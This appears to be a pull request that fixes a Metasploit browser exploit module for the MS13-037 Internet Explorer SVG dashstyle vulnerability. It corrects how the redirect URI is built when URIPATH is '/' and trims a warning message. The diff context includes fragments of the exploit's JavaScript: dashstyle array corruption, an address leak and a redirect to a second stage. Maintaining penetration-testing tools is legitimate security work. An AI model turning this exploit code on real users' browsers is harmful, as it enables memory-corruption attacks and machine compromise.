### PR TITLE
ms13_037_svg: Fix URIPATH=/ and stack trace on missing ntdll version match

### DIFF
--- a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
+++ b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
@@ -279,6 +279,8 @@ function exploit(){
 
   def html_info_leak
 
+    uri_prefix = "#{get_resource.chomp("/")}/#{@second_stage_url}".gsub('//', '/')
+
     js_trigger = %Q|
 var rect_array = new Array()
 var a = new Array()
@@ -318,7 +320,7 @@ function exploit(){
       var leak = a[i].marginLeft;
       vml1.dashstyle.array.item(0x2E+0x16) = marginLeftAddress;
       vml1.dashstyle.array.length = length_orig;
-      document.location = "#{get_resource.chomp("/")}/#{@second_stage_url}" + "?#{@leak_param}=" + parseInt( leak.charCodeAt(1).toString(16) + leak.charCodeAt(0).toString(16), 16 )
+      document.location = "#{uri_prefix}?#{@leak_param}=" + parseInt( leak.charCodeAt(1).toString(16) + leak.charCodeAt(0).toString(16), 16 )
       return;
     }
   }
@@ -414,7 +416,7 @@ function exploit(){
         @ntdll_version = "6.1.7601.17725" # MS12-001
         @ntdll_base = leak - 0x47090
       else
-        print_warning("ntdll version not detected, sending 404: #{agent}")
+        print_warning("ntdll version not detected, sending 404")
         send_not_found(cli)
         return
       end


### PR DESCRIPTION
This fixes a stack trace when the leaked version does not match and handles the case of URIPATH being set to / properly. Without the URIPATH fix, the exploit will redirect the user to a random UNC host name due to two leading slashes.
